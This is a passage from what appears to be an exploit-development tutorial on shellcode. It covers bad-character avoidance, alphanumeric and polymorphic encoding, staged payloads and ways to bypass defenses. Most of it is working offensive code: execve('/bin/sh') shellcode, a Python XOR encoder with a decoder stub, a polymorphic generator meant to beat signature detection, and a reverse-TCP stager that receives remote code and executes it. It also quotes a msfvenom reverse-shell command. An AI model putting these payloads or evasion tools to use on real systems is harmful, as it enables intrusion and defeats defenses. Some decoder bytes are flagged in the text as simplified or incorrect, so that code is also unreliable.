    inc rsi
    cmp rsi, 3
    jne dup_loop
    
    ;; Execute shell: execve("/bin/sh", NULL, NULL)
    xor rsi, rsi
    push rsi                      ; NULL terminator
    mov rdi, 0x68732f2f6e69622f   ; "/bin//sh"
    push rdi
    mov rdi, rsp                  ; RDI = pointer to string
    xor rdx, rdx                  ; envp = NULL
    push 59
    pop rax                       ; syscall 59 = execve
    syscall

32-bit vs 64-bit Syscalls

Avoiding Bad Characters

Bad characters are bytes that the vulnerability context corrupts, terminates, or filters. Common bad characters include:

\x00 (NULL) — Terminates strings in C
\x0a (newline) — Terminates input for fgets, line-based protocols
\x0d (carriage return) — Terminates input in some contexts
\x20 (space) — May be treated as delimiter
\x09 (tab) — May be treated as whitespace
\xff — Sometimes filtered by UTF-8 validation

The specific bad characters depend on the vulnerability and input handling.

Finding Bad Characters

•Send full byte range (0x00-0xff) as test payload
•Compare received/stored data with original
•Missing or altered bytes are bad chars
•Tools: mona.py, BadChars generator

Avoidance Strategies

•XOR encoding with single-byte key
•Multi-byte XOR for stronger encoding
•Alphanumeric shellcode (A-Z, a-z, 0-9 only)
•Unicode-safe encoding for wide-char contexts

xor_encoder.py
Python
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
#!/usr/bin/env python3
"""
XOR Encoder for Shellcode
Encodes shellcode to avoid specified bad characters
Prepends a decoder stub that runs first and decodes the payload
"""
 
def find_xor_key(shellcode: bytes, bad_chars: bytes) -> int:
    """Find an XOR key that, when applied, produces no bad characters."""
    for key in range(1, 256):  # Skip 0 as XOR with 0 is no-op
        encoded = bytes([b ^ key for b in shellcode])
        if not any(c in bad_chars for c in encoded):
            # Also verify the key itself isn't a bad char (appears in decoder)
            if key not in bad_chars:
                return key
    raise ValueError("No valid XOR key found - try multi-byte encoding")
 
def xor_encode(shellcode: bytes, key: int) -> bytes:
    """XOR encode shellcode with given key."""
    return bytes([b ^ key for b in shellcode])
 
def generate_decoder_stub(key: int, length: int) -> bytes:
    """
    Generate x86-64 decoder stub.
    This stub XOR-decodes the following payload in-place.
    """
    # Decoder stub that decodes payload after itself
    # Uses JMP-CALL-POP to get address of encoded payload
    decoder = bytes([
        0xeb, 0x0d,                    # jmp short get_payload_addr
        # decode_loop:
        0x5e,                          # pop rsi (address of encoded shellcode)
        0x31, 0xc9,                    # xor ecx, ecx
        0xb1, length,                  # mov cl, length
        # decode:
        0x80, 0x36, key,               # xor byte [rsi], key
        0x46,                          # inc rsi (should be 0x48, 0xff, 0xc6 for 64-bit)
        0xe2, 0xfa,                    # loop decode (-6)
        0xeb, 0x05,                    # jmp short shellcode
        # get_payload_addr:
        0xe8, 0xee, 0xff, 0xff, 0xff,  # call decode_loop
        # Encoded shellcode follows here
    ])
    return decoder
 
# Example usage
original_shellcode = bytes([
    0x48, 0x31, 0xf6,              # xor rsi, rsi
    0x48, 0xbf, 0x2f, 0x62, 0x69,  # mov rdi, '/bin//sh'
    0x6e, 0x2f, 0x2f, 0x73, 0x68,
    0x57,                          # push rdi
    0x48, 0x89, 0xe7,              # mov rdi, rsp
    0x48, 0x31, 0xd2,              # xor rdx, rdx
    0xb0, 0x3b,                    # mov al, 59
    0x0f, 0x05                     # syscall
])
 
bad_chars = b"\x00\x0a\x0d"
 
print(f"Original shellcode: {len(original_shellcode)} bytes")
print(f"Bad characters to avoid: {bad_chars.hex()}")
 
# Find suitable key
key = find_xor_key(original_shellcode, bad_chars)
print(f"XOR key found: 0x{key:02x}")
 
# Encode
encoded = xor_encode(original_shellcode, key)
print(f"Encoded shellcode: {encoded.hex()}")
 
# Verify no bad chars
for c in encoded:
    if bytes([c]) in bad_chars:
        print(f"ERROR: Bad char 0x{c:02x} in encoded shellcode!")
        break
else:
    print("✓ No bad characters in encoded payload")
 
# Generate complete payload with decoder
decoder = generate_decoder_stub(key, len(original_shellcode))
final_payload = decoder + encoded
print(f"Final payload: {len(final_payload)} bytes")
print(f"Payload hex: {final_payload.hex()}")

Self-Decoding Payloads

Alphanumeric and Polymorphic Shellcode

Alphanumeric Shellcode

•Constraint: Only bytes 0x30-0x39 (0-9), 0x41-0x5A (A-Z), 0x61-0x7A (a-z) allowed
•Challenge: Most essential instructions (syscall, jumps) use non-alphanumeric bytes
•Solution: Use the limited valid instructions to build a decoder that can generate arbitrary bytes
•Techniques: XOR with alphanumeric values, push/pop combinations, arithmetic operations
•Tools: alpha2, msfvenom's alpha_mixed encoder, ALPHA3

alphanumeric_concept.asm

Assembly Concepts

;; Alphanumeric-compatible instructions (x86)
;; These opcodes fall within A-Z, a-z, 0-9 ASCII ranges
 
;; Valid alphanumeric instructions include:
;; push/pop certain registers: P (0x50) = push eax, X (0x58) = pop eax
;; inc/dec: I = dec ecx (0x49), A = inc ecx (0x41), etc.
;; xor reg,imm: 5 = xor eax,imm32 (0x35)
;; and reg,imm: % = and eax,imm32 (0x25)
 
;; Example: Building arbitrary value in EAX using only alphanumeric ops
;; Goal: Put 0x99c0cd80 (int 0x80 + nop pattern) in EAX
;; Approach: Use AND with two values that AND to 0, then XOR in target
 
push eax                    ; P (0x50) - valid
and eax, 0x554e4d4a        ; %JMN\U (valid alphanumeric)
and eax, 0x2a313235        ; %125*1 (valid, with AND produces 0x00000000)
xor eax, 0x39443143        ; 5C1D9 (valid alphanumeric)
;; Sequential XORs can build any 32-bit value
 
;; After building decoder in alphanumeric ops, decode and run real shellcode
 
;; Tools like alpha2 automatically generate these sequences
;; Example: msfvenom -p linux/x86/shell_reverse_tcp ... -e x86/alpha_mixed

Polymorphic Shellcode

Polymorphic shellcode changes its appearance on each generation while maintaining identical functionality. This defeats signature-based detection that looks for specific byte patterns.

How Polymorphism Works:

Variable encoding keys: Each instance uses a different XOR key, completely changing all encoded bytes
Decoder variation: The decoder stub itself uses different but equivalent instructions
NOP substitution: Different single-byte NOPs or multi-byte NOP equivalents
Register shuffling: Use different registers for the same operations
Junk insertion: Add non-functional instructions that change signature but don't affect execution

polymorphic_generator.py
Python
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
#!/usr/bin/env python3
"""
Simple Polymorphic Shellcode Generator
Generates unique encoded variants of base shellcode
"""
 
import random
 
def generate_polymorphic_variant(shellcode: bytes) -> bytes:
    """Generate a unique polymorphic variant of shellcode."""
    
    # Random XOR key (avoid 0x00)
    key = random.randint(1, 255)
    
    # Encode shellcode
    encoded = bytes([b ^ key for b in shellcode])
    
    # Generate decoder with random variations
    decoder = generate_varied_decoder(key, len(shellcode))
    
    # Add random NOP sled variation
    nop_variants = [
        b"\x90",              # NOP
        b"\x40\x48",         # inc eax; dec eax (null operation pair)
        b"\x87\xc0",         # xchg eax, eax
        b"\x86\xc9",         # xchg cl, cl  
    ]
    
    nop_sled = b""
    for _ in range(random.randint(8, 32)):
        nop_sled += random.choice(nop_variants)
    
    return nop_sled + decoder + encoded
 
def generate_varied_decoder(key: int, length: int) -> bytes:
    """Generate decoder with random instruction choices."""
    
    # Choose random register for loop counter (CL or BL)
    use_cl = random.choice([True, False])
    
    if use_cl:
        # Version using CL
        set_counter = bytes([0x31, 0xc9, 0xb1, length])  # xor ecx,ecx; mov cl,len
        loop_inst = bytes([0xe2])                        # loop
    else:
        # Version using BL (requires different loop logic)
        set_counter = bytes([0x31, 0xdb, 0xb3, length])  # xor ebx,ebx; mov bl,len
        loop_inst = bytes([0xfe, 0xcb, 0x75])            # dec bl; jnz
    
    # Random junk instructions to insert (no-ops that change signature)
    junk_options = [
        b"",                   # No junk
        b"\x50\x58",         # push eax; pop eax
        b"\x51\x59",         # push ecx; pop ecx
        b"\x90",              # nop
    ]
    junk = random.choice(junk_options)
    
    # Build decoder (simplified)
    decoder = bytes([
        0xeb, 0x0d + len(junk),  # jmp to get_addr
    ]) + junk + bytes([
        0x5e,                    # pop rsi
    ]) + set_counter + bytes([
        0x80, 0x36, key,         # xor byte [rsi], key
        0x46,                    # inc rsi
    ]) + loop_inst + bytes([
        0xfa,                    # -6 offset
        0xeb, 0x05,              # jmp to shellcode
        0xe8,                    # call
    ]) + bytes([
        (0x100 - (0x12 + len(junk))) & 0xff, 0xff, 0xff, 0xff
    ])
    
    return decoder
 
# Generate multiple unique variants of same shellcode
base_shellcode = bytes([
    0x31, 0xc0, 0x50, 0x68, 0x2f, 0x2f, 0x73, 0x68,
    0x68, 0x2f, 0x62, 0x69, 0x6e, 0x89, 0xe3, 0x50,
    0x53, 0x89, 0xe1, 0xb0, 0x0b, 0xcd, 0x80
])
 
print("Generating 3 polymorphic variants:")
for i in range(3):
    variant = generate_polymorphic_variant(base_shellcode)
    print(f"\nVariant {i+1}: {len(variant)} bytes")
    print(f"  First 20 bytes: {variant[:20].hex()}")
    print(f"  Hash: {hash(variant) & 0xffffffff:08x}")

Metamorphic Shellcode

Staged and Modular Payloads

Converting Mermaid diagram...

Staged Payload Architecture

•Stager (Stage 1) — Minimal code that establishes communication and receives the main payload. Examples: reverse_tcp stager (~30 bytes), bind_tcp stager (~50 bytes), find_sock stager (~35 bytes).
•Payload (Stage 2) — The full-featured payload delivered after stager connects. Can be arbitrarily large since it's transmitted over network/socket.
•Egghunter Variant — When second stage is already in memory (e.g., larger buffer elsewhere), stager searches for signature ('egg') and jumps to it.

stager.asm

Assembly (x86-64)

;; Minimal TCP Stager (reverse connect, receive, execute)
;; Fits in approximately 75 bytes
;; Connects to attacker, receives arbitrary code, executes it
 
section .text
global _start
 
_start:
    ;; socket(AF_INET=2, SOCK_STREAM=1, 0)
    push 41                       ; syscall: socket
    pop rax
    push 2
    pop rdi                       ; AF_INET
    push 1
    pop rsi                       ; SOCK_STREAM
    xor rdx, rdx                  ; 0
    syscall
    mov r12, rax                  ; Save socket fd
 
    ;; Build sockaddr_in and connect
    push rdx                      ; 0 padding
    mov eax, 0x0100007f           ; 127.0.0.1
    push rax
    push word 0x5c11              ; Port 4444
    push word 2                   ; AF_INET
    
    push 42                       ; syscall: connect
    pop rax
    mov rdi, r12                  ; socket fd
    mov rsi, rsp                  ; sockaddr pointer
    push 16
    pop rdx                       ; addrlen
    syscall
 
    ;; mmap executable memory for payload
    push 9                        ; syscall: mmap
    pop rax
    xor rdi, rdi                  ; addr = NULL
    push 4096
    pop rsi                       ; length
    push 7                        ; PROT_READ|WRITE|EXEC
    pop rdx
    push 0x22                     ; MAP_ANONYMOUS|PRIVATE
    pop r10
    push 0xffffffffffffffff
    pop r8                        ; fd = -1
    xor r9, r9                    ; offset = 0
    syscall
    mov r13, rax                  ; Save mmap address
 
    ;; read(socket, mmap_addr, 4096)
    xor rax, rax                  ; syscall: read
    mov rdi, r12                  ; socket fd
    mov rsi, r13                  ; buffer (mmap)
    push 4096
    pop rdx                       ; count
    syscall
 
    ;; Jump to received payload
    jmp r13

Egghunter Technique

When you can inject a large payload into memory but only control a small buffer for the initial exploit, an egghunter bridges the gap:

Inject large payload into some reachable memory (heap, environment, etc.)
Prefix payload with unique 8-byte signature (the "egg"): e.g., w00tw00t
Small egghunter shellcode in exploited buffer searches memory for egg
When found, jump to address immediately after egg

Egghunters must handle:

Invalid memory pages (use syscalls to safely probe)
Searching in correct direction
Finding the actual payload, not the egg reference in the egghunter itself (hence doubled egg signature)

Metasploit Framework

Modern Shellcode Challenges

Defenses Against Code Injection
Defense	Mechanism	Impact on Shellcode	Bypass Technique
DEP/NX	Data pages marked non-executable	Injected shellcode cannot run	ROP chains, ret2libc, calling mprotect
ASLR	Randomize library/stack addresses	Cannot predict where to return	Info leak, partial overwrite, brute force
Stack Canaries	Secret value before return address	Overflow detected before RET	Info leak canary, format string
CFI	Control flow integrity checks	Invalid jump targets blocked	CFI-compliant gadgets, fine-grained attacks
Sandboxing	Restrict available syscalls	Shellcode functionality limited	Use allowed syscalls, sandbox escape

Adaptation Strategies

•ROP for DEP Bypass — Instead of executing injected code, chain existing code fragments ('gadgets') that end in RET. Turing-complete computation possible. Covered in next page.
•Information Leaks for ASLR Bypass — Use separate vulnerability to read memory, revealing library addresses. Single leak can dereference entire attacking chain.
•Canary Brute Force — On fork-based servers, child crashes don't affect parent. Byte-by-byte canary revelation possible.
•JIT Spray — Inject shellcode disguised as JIT-compiled code. JavaScript engines (pre-mitigations) would mark it executable.
•Data-Only Attacks — Corrupt application data without changing control flow. Avoid DEP and CFI but achieve desired outcome.

The Arms Race Continues

Summary: Mastering Code Injection

We've explored the art and science of shellcode development—from fundamental position-independent code to advanced polymorphic and staged payloads. Let's consolidate the key insights.

Key Takeaways

•Shellcode must be position-independent — JMP-CALL-POP, stack-based strings, and RIP-relative addressing enable code that runs anywhere in memory.
•System calls are the shellcode's interface to the kernel — Understanding syscall mechanics enables arbitrary actions: spawning shells, network connections, file operations.
•Bad characters require encoding — XOR encoding with decoder stubs bypasses byte filters; alphanumeric encoders handle the most restrictive contexts.
•Polymorphism defeats signatures — Varying encoding keys, instruction selection, and junk insertion makes each payload unique.
•Staged payloads overcome size limits — Tiny stagers fetch full payloads over network; egghunters locate large payloads in memory.
•Modern defenses require adaptation — DEP, ASLR, and CFI don't eliminate exploitation but shift techniques toward ROP, info leaks, and chains.

What's Next: Return-Oriented Programming

Page Complete